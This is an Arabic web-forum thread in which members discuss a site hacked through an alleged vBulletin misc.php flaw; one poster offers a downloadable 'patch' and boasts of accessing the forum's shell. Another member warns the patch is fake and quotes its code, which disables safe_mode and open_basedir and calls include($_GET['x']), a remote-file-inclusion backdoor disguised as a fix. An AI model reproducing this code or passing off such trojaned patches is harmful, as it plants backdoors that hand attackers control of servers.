صفحة 1 من 2 12 الأخيرةالأخيرة
النتائج 1 إلى 15 من 24

الموضوع: اللي نكروا الموضوع misc.php

  1. #1
    عضو سوبر نشيط
    تاريخ التسجيل
    Mar 2000
    المشاركات
    762

    اللي نكروا الموضوع misc.php



    http://www.w-enter.com/forum/

    نبي حل سريع





    __________________
    Eng.Fedail
    Computer and Electronics Engineer
    الثلج غير متواجد حالياً


  2. #2
    عضو سوبر نشيط
    تاريخ التسجيل
    Sep 2006
    المشاركات
    626


    وش السالفة ؟





    __________________
    مواضيع سوالف اليوم
    قبل التعامل مع اي شخص, انظر ملفه الشخصي.
    كتاب
    © بندر © غير متواجد حالياً

  3. #3
    عضو نشيط
    تاريخ التسجيل
    Oct 2005
    المشاركات
    47


    نعم تم اختراق الموقع بواسطة HAKING MASTER

    وقام بحذف الاعضاء والمواضيع والاقسام

    والسبب انه يبي يسوي حمله على مواقع الدعم العربيه

    مع العلم ان موقعي ليس موقع دعم وانما موقع للتصميم فقط

    ولكن ماصدق شاف ثغره وحب يستمتع

    حسبي الله ونعم اوكيل





    __________________
    تعلم الفلاش من الصفر حتى الإحتراف

    من خلال دورة :: W-ENTER :: لتعليم الفلاش بالفيديو

    http://www.w-enter.com/forum/showthread.php?t=518

    W-ENTER.com
    :: W-ENTER :: غير متواجد حالياً

  4. #4
    عضو سوبر نشيط
    تاريخ التسجيل
    Sep 2006
    المشاركات
    741


    ايش هي الثغرة ممكن شوية توضيح





    __________________
    الحمد لله تعلم الفوركس
    سبعات غير متواجد حالياً

  5. #5
    عضو سوبر نشيط
    تاريخ التسجيل
    Jun 2005
    المشاركات
    750


    W-enter
    اخترق؟
    حسبي الله ونعم الوكيل
    موقع مافيه ذرة شبهه موقع تعليمي بحت
    اخوي الثغرة الي قلت عنها الكهف قال انها خاطئة
    ومافي ثغرة
    شسالفة ياجماعة؟





    أبو سالم غير متواجد حالياً

  6. #6
    عضو نشيط جدا
    تاريخ التسجيل
    Sep 2006
    المشاركات
    417


    لا حول ولا قوه الا بالله

    والله ما انا فاهم شو قصه هل العالم هذه .





    Barakat غير متواجد حالياً

  7. #7
    عضو فعال جدا
    تاريخ التسجيل
    Jun 2004
    المشاركات
    3,528


    اخوي

    :: W-ENTER ::

    اذا محتاج مساعدة! .. لايردك الا لسانك وكيبوردك

    احنا بخدمة الوجيه الطيبه





    __________________


    oO(الباسل)oO غير متواجد حالياً

  8. #8
    عضو فعال
    تاريخ التسجيل
    Oct 2005
    المشاركات
    1,797


    اخوي

    :: W-ENTER ::

    اذا محتاج مساعدة! .. لايردك الا لسانك وكيبوردك

    احنا بخدمة الوجيه الطيبه






    m7bobh غير متواجد حالياً

  9. #9
    عضو سوبر نشيط
    تاريخ التسجيل
    Jun 2005
    المشاركات
    750


    ياريت ياجماعة يجي ويتأكد اخونا الكهف يشوف السالفة





    أبو سالم غير متواجد حالياً

  10. #10
    Banned
    تاريخ التسجيل
    Nov 2005
    المشاركات
    32


    السلام عليكم و رحمة الله و بركاته

    هنا الثغرة

    السلام عليكم و رحمة الله و بركاته

    1-درجة خطورة الثغره : خطيرة جداً جداً جداً جداً (( يدعوها الهاكرز Remote file include و هي تسمح بربط ملف شـــل يسمح بالتحكم بكل السيرفر و ليس المنتدى أو الموقع المستهدف فحسب ))
    2- مكتشف الثغره أو الترقيع : BlueGhost
    3-المصدر : منتديات المرافق

    نبدأ الشرح بسم الله الرحمن الرحيم

    بعد تحميلك للملف اللي في المرفقات

    فك ضغطه

    تطلعلك مجلدات كثيرة

    كل مجلد إسمه حسب إصدار vbulletin

    صورة :



    أدخل المجلد المناسب لإصدار منتداك

    تلاقي بداخله ملف misc.php متناسب مع إصدار منتداك

    إرفعه في مجلد منتداك ( إفتراضياً يكون vb )

    ---

    إنتهينا

    و السلام عليكم و رحمة الله و بركاته

    لقيتها في منتدى ثاني و حبيت أنشرها لكم


    الثغرة أكتشفت بعد صدور النسخة 3.6.2
    و هي موجودة بكل النسخ

    ملفات الترقيع هنااااااااااااااااا http://www.m5zn.com/download3.php?fi...0a56121fd2.zip

    وأنا جربت الثغرة على منتداكم و هي شغاااااااااااااااااااااااااااااالة و تمكنت من دخول الشل و العبث بكل شئ إلا أن نفسي لم تطاوعني

    و السلام عليكم و رحمة الله و بركاته





    The Shifty غير متواجد حالياً

  11. #11
    فضلاً اكتب اسمك الحقيقي هنا
    زائرb9n9


    هذه الثغره كذبه

    والملف الموضوع بالرد السابق فيه اكواد تجعل المنتدى سهل الاختراق

    كود:
    $f=trim($f); 
    echo ini_get("safe_mode"); 
    echo ini_get("open_basedir"); 
    include("$f"); 
    ini_restore("safe_mode"); 
    ini_restore("open_basedir"); 
    echo ini_get("safe_mode"); 
    echo ini_get("open_basedir"); 
    include("$f"); 
    include($_GET['x']);
    ارجو الانتباه من هذه الكذبه التي انتشرت بالمنتديات






  12. #12
    عضو نشيط جدا
    تاريخ التسجيل
    Sep 2006
    المشاركات
    417


    اقتباس المشاركة الأصلية كتبت بواسطة الثلج
    http://www.w-enter.com/forum/

    نبي حل سريع
    بس هو سؤال واحد فقط اخوي و لاتفهم قصدي خطأ

    انت شو عرفك انه منتدى الاخ مازن تم اختراقه بواسطه هذه الثغره كما تدعي ؟

    ممكن يكون ثغره ثانيه وليس لها اي علاقه بهذا يلي تتكلم به!!!





    Barakat غير متواجد حالياً

  13. #13
    Banned
    تاريخ التسجيل
    Nov 2005
    المشاركات
    32


    اقتباس المشاركة الأصلية كتبت بواسطة b9n9
    هذه الثغره كذبه

    والملف الموضوع بالرد السابق فيه اكواد تجعل المنتدى سهل الاختراق

    كود:
    $f=trim($f); 
    echo ini_get("safe_mode"); 
    echo ini_get("open_basedir"); 
    include("$f"); 
    ini_restore("safe_mode"); 
    ini_restore("open_basedir"); 
    echo ini_get("safe_mode"); 
    echo ini_get("open_basedir"); 
    include("$f"); 
    include($_GET['x']);
    ارجو الانتباه من هذه الكذبه التي انتشرت بالمنتديات

    مع أني لا أفهم بالبرمجة لكني أشهد أنه لما رقعت بهذا الملف إختفت الثغرة ( لأني أعرف إستغلالها )


    اقتباس المشاركة الأصلية كتبت بواسطة Barakat
    بس هو سؤال واحد فقط اخوي و لاتفهم قصدي خطأ

    انت شو عرفك انه منتدى الاخ مازن تم اختراقه بواسطه هذه الثغره كما تدعي ؟

    ممكن يكون ثغره ثانيه وليس لها اي علاقه بهذا يلي تتكلم به!!!

    الهاكر لما إخترق w-enter كتب أنه إخترقه بواسطة ثغرة misc.php



    الثغرة موجووووووودة يرجى الترقيع حالاً و إنتوا ما راح تخسروا شئ .. خذوها نصيحة مجرب





    The Shifty غير متواجد حالياً

  14. #14
    عضو نشيط
    تاريخ التسجيل
    Jan 2002
    المشاركات
    134


    أنا متأكد أن الثغره غير موجوده ..





    __________________
    █████████
    █████████
    █████████
    Moon4ae غير متواجد حالياً

  15. #15
    عضو نشيط جدا
    تاريخ التسجيل
    Sep 2006
    المشاركات
    417


    مع احترامي اخواني لا اعتقد بان الثغره موجوده اصلا بملف misc.php

    على ايه حال سوف اتأكد واردلكم خبر بعد قليل





    Barakat غير متواجد حالياً





ضوابط المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •  

أضف موقعك هنا| اخبار السيارات | حراج | شقق للايجار في الكويت | بيوت للبيع في الكويت | دليل الكويت العقاري | مقروء | شركة كشف تسربات المياه | شركة عزل اسطح بالرياض | عزل فوم بالرياض| عزل اسطح بالرياض | كشف تسربات المياة بالرياض | شركة عزل اسطح بالرياض